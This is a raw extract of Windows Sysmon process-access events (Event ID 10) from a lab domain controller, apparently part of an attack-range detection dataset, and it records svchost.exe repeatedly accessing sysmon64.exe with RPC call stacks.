13:53:21.706{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001674Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.706{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001673Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.706{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001672Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.705{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001671Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.705{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001670Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.705{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001669Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.701{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001668Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.701{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001667Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.701{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001666Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.701{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001665Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.701{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001664Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.701{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001663Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.701{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001662Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.701{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001661Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.701{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001660Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001659Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001658Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001657Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001656Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001655Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001654Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001653Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001652Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.697{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001651Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 